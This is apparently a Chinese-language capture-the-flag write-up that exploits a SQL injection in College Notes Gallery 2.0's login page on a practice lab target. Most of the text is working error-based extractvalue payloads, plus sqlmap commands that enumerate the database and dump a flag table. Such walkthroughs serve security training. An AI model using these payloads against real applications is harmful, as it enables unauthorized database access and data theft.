简介

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序，访问或修改数据.

正文

这关有我用了两种办法，第一种是用报错注入进行手注，第二种就是sqlmap

首先进入靶场我们就可以看到有个login登录的按键，直接点进去。

第一种，报错注入

进入登录界面那就直接开始测试，我们进来就看到这里有个报错，那么就很明显的知道这里可以用报错注入。那么就开始测闭合，发现是单引号闭合。

爆数据库名

1'+and+(extractvalue(1,concat(0x7e,(select+database()),0x7e)))=1--+

爆表名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema='notes'),0x7e)))=1--+

爆列名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_schema='notes'+and+table_name='flllaaaag'),0x7e)))=1--+

爆内容

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(flag)from+flllaaaag),0x7e)))=1--+

注意

这里因为报错注入输出是有限制长度的，所以我们需要用截断函数来把后面的的内容显示出来。

1'+and+(extractvalue(1,concat(0x7e,substr((select+group_concat(flag)from+flllaaaag),20,40),0x7e)))=1--+

第二种方式sqlmap

爆库名

python sqlmap.py -r 2.txt -batch -dbs

爆表名

python sqlmap.py -r 2.txt -batch -D notes -tables

爆列名

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns

爆数据

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump